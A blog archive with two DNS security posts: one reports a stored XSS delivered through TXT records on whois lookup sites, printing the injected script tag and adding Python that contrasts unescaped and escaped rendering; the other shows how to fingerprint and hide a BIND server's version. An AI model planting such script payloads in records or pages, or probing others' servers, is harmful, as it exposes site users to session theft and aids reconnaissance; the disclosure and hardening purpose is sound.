Category Archives: DNS

XSS via DNS

XSS (Cross-Site Scripting) is a type of injection attack in which malicious scripts are injected into trusted web sites. Your browser has no way to know that the script should not be trusted and executes it. The script can then access cookies, session tokens, or other sensitive information, which can be passed to the attacker.

The golden rule “Do not trust user input” seems to be forgotten in some cases. The guy succeeded in injecting a malicious script via a TXT record on his domain, and the script is promptly executed when you check his domain via Whois lookup services that render the record contents unescaped.

The vulnerable sites:
http://who.is/
http://mxtoolbox.com/
http://dig.whois.com.au/

Some of them are already patched, but the taste remains 🙂

The ycombinator discussion: https://news.ycombinator.com/item?id=8336025

The exact TXT content:

comp@comp ~ $ dig txt jamiehankins.co.uk
 
; <<>> DiG 9.9.5-3-Ubuntu <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24931
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3
 
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk.		IN	TXT
 
;; ANSWER SECTION:
jamiehankins.co.uk.	300	IN	TXT	"google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.	300	IN	TXT	"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.	300	IN	TXT	"v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.	300	IN	TXT	"<script src='//peniscorp.com/topkek.js'></script>"
 
;; AUTHORITY SECTION:
jamiehankins.co.uk.	172800	IN	NS	hank.ns.cloudflare.com.
jamiehankins.co.uk.	172800	IN	NS	lucy.ns.cloudflare.com.
 
;; ADDITIONAL SECTION:
hank.ns.cloudflare.com.	11832	IN	A	173.245.59.116
hank.ns.cloudflare.com.	11832	IN	AAAA	2400:cb00:2049:1::adf5:3b74
 
;; Query time: 81 msec
;; SERVER: 127.0.1.1#53(127.0.1.1)
;; WHEN: Thu Sep 18 23:21:30 CEST 2014
;; MSG SIZE  rcvd: 481
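As an added example, not code from the original post or from any of the lookup sites named above, the Python below shows the rendering bug behind this finding beside its fix: a lookup tool that concatenates TXT record data straight into its HTML page turns whatever markup the zone owner put there into live tags, while one that HTML-escapes the data displays the same record as inert text. The record strings, the zone name example.com and the function names are constructed for this example.

```python
import html
import re

# Constructed sample TXT records for a hypothetical zone example.com (not a live
# lookup). The last two mimic the markup-bearing records in the dig output above.
SAMPLE_TXT_RECORDS = [
    "google-site-verification=EXAMPLE-TOKEN-PLACEHOLDER",
    "v=spf1 include:spf.example.net ?all",
    "<iframe width='420' height='315' src='//video.example.invalid/embed/x'></iframe>",
    "<script src='//evil.example.invalid/payload.js'></script>",
]

def render_txt_row_unsafe(name, txt):
    """The vulnerable pattern: untrusted record data concatenated straight into
    HTML, so a record containing a <script> tag becomes a live script."""
    return f"<tr><td>{name}</td><td>TXT</td><td>{txt}</td></tr>"

def render_txt_row_safe(name, txt):
    """Hardened pattern: every untrusted value is HTML-escaped before it lands in
    element content, so the same record is displayed as inert text."""
    return (f"<tr><td>{html.escape(name)}</td><td>TXT</td>"
            f"<td>{html.escape(txt, quote=True)}</td></tr>")

def render_table(name, records, safe=True):
    """Render all TXT records of `name` as an HTML table, safely by default."""
    row = render_txt_row_safe if safe else render_txt_row_unsafe
    return "<table>\n" + "\n".join(row(name, r) for r in records) + "\n</table>"

TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def leaks_markup(rendered, untrusted_values):
    """Regression check for the output: True if any untrusted value that contains
    a tag appears verbatim (unescaped) in the rendered page."""
    return any(TAG_RE.search(v) and v in rendered for v in untrusted_values)

if __name__ == "__main__":
    for safe in (False, True):
        page = render_table("example.com", SAMPLE_TXT_RECORDS, safe=safe)
        print("safe" if safe else "UNSAFE", "-> leaks markup:",
              leaks_markup(page, SAMPLE_TXT_RECORDS))
```

Escaping at the point where the value enters element content is the fix; a check like leaks_markup belongs in the lookup tool's test suite, with records that carry tags, so the regression cannot come back unnoticed.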

How to test the BIND version running on a DNS server?

BIND, or Berkeley Internet Name Domain, is DNS server software that answers the name lookups which let you find the sites you are looking for. A BIND server holds the DNS records for the names it serves, so, for example, if you type www.bla.com into your browser, the record tells your browser at what IP address to find the site. If you need to find out which BIND version a DNS server is running, you can use the following commands:

Windows

nslookup -q=txt -class=CHAOS version.bind 192.168.51.250

Linux

# dig -t txt -c chaos VERSION.BIND @192.168.51.250

After this, you should get the following answers:

Windows

Server:  my.server.net
Address:  192.168.51.250
 
version.bind    text =
 
        "9.3.4-P1"
version.bind    nameserver = version.bind

Linux users will get more details about the server:

[root@server ~]# dig -t txt -c chaos VERSION.BIND @192.168.51.250
 
; <<>> DiG 9.3.4-P1 <<>> -t txt -c chaos VERSION.BIND @192.168.51.250
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44906
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
 
;; QUESTION SECTION:
;VERSION.BIND.                  CH      TXT
 
;; ANSWER SECTION:
VERSION.BIND.           0       CH      TXT     "9.3.4-P1"
 
;; AUTHORITY SECTION:
VERSION.BIND.           0       CH      NS      VERSION.BIND.
 
;; Query time: 54 msec
;; SERVER: 192.168.51.250#53(192.168.51.250)
;; WHEN: Mon Mar 23 20:09:57 2009
;; MSG SIZE  rcvd: 65

To hide your BIND version, add the following option to the options block in named.conf (the commands shown above will then return the configured string instead of the real BIND version):

options {
    .....
    // string returned for version.bind CH TXT queries instead of the real version
    version "[SECURED]";
};

Save named.conf and restart named.
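As an added example that is not part of the original post, the Python below builds the same CHAOS-class version.bind TXT query that the dig and nslookup commands above send, parses the TXT answer out of a DNS response, and reports whether the server still discloses a real version after the named.conf change. To run offline it constructs a sample response in the shape of the dig output above (flags qr aa rd, one CH TXT answer with TTL 0); the query_bind_version helper, which sends the query over UDP, is optional and only shows how the packet is used. The function names are this example's own; the server address 192.168.51.250 is the one from the post.

```python
import struct

CLASS_CH = 3    # CHAOS class, the class in which BIND answers version.bind
TYPE_TXT = 16

def encode_name(name):
    """Encode a dotted name as DNS labels (length byte + label), terminated by 0x00."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_version_bind_query(txid=0x1234):
    """Wire-format equivalent of `dig -t txt -c chaos VERSION.BIND`: one question,
    RD flag set, QTYPE TXT, QCLASS CH."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = encode_name("version.bind") + struct.pack("!HH", TYPE_TXT, CLASS_CH)
    return header + question

def decode_name(data, offset):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, jumped = [], None, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)

def parse_txt_answers(packet):
    """Return the character-strings of every CH TXT record in the answer section."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    offset = 12
    for _ in range(qdcount):            # skip the echoed question(s)
        _, offset = decode_name(packet, offset)
        offset += 4                      # QTYPE + QCLASS
    strings = []
    for _ in range(ancount):
        _, offset = decode_name(packet, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[offset:offset + 10])
        offset += 10
        rdata = packet[offset:offset + rdlen]
        offset += rdlen
        if rtype == TYPE_TXT and rclass == CLASS_CH:
            pos = 0
            while pos < len(rdata):      # TXT RDATA is a sequence of <len><bytes>
                slen = rdata[pos]
                strings.append(rdata[pos + 1:pos + 1 + slen].decode("ascii", "replace"))
                pos += 1 + slen
    return strings

def build_sample_response(version, txid=0x1234):
    """Constructed reply (not a capture) shaped like the dig output above: flags
    qr aa rd, the question echoed, one CH TXT answer with TTL 0 holding `version`."""
    header = struct.pack("!HHHHHH", txid, 0x8500, 1, 1, 0, 0)
    question = encode_name("version.bind") + struct.pack("!HH", TYPE_TXT, CLASS_CH)
    txt = bytes([len(version)]) + version.encode("ascii")
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, CLASS_CH, 0, len(txt)) + txt
    return header + question + answer

def version_is_hidden(strings):
    """Defender check: True when no answer string looks like a real version number
    (e.g. the server returns the "[SECURED]" string configured in named.conf)."""
    return all(not any(ch.isdigit() for ch in s) for s in strings)

def query_bind_version(server, port=53, timeout=3.0):
    """Optional live check (needs network): send the query over UDP, parse the reply."""
    import socket
    txid = 0x1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_version_bind_query(txid), (server, port))
        data, _ = sock.recvfrom(4096)
    if data[:2] != struct.pack("!H", txid):
        raise ValueError("transaction id mismatch")
    return parse_txt_answers(data)

if __name__ == "__main__":
    # Offline demonstration; for a live server use query_bind_version("192.168.51.250").
    for ver in ("9.3.4-P1", "[SECURED]"):
        answers = parse_txt_answers(build_sample_response(ver))
        print(ver, "->", answers, "hidden" if version_is_hidden(answers) else "DISCLOSED")
```

The point worth noticing on the wire is the QCLASS field: it is 3 (CH) rather than the usual 1 (IN), which is why the ordinary `dig txt version.bind` gets nothing while the `-c chaos` form does. After the named.conf change the same query still gets an answer, just the configured string, so a monitoring check should assert on the content of the answer and not merely on whether one arrives.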

Remember that BIND is the most popular DNS server software, but not the only one…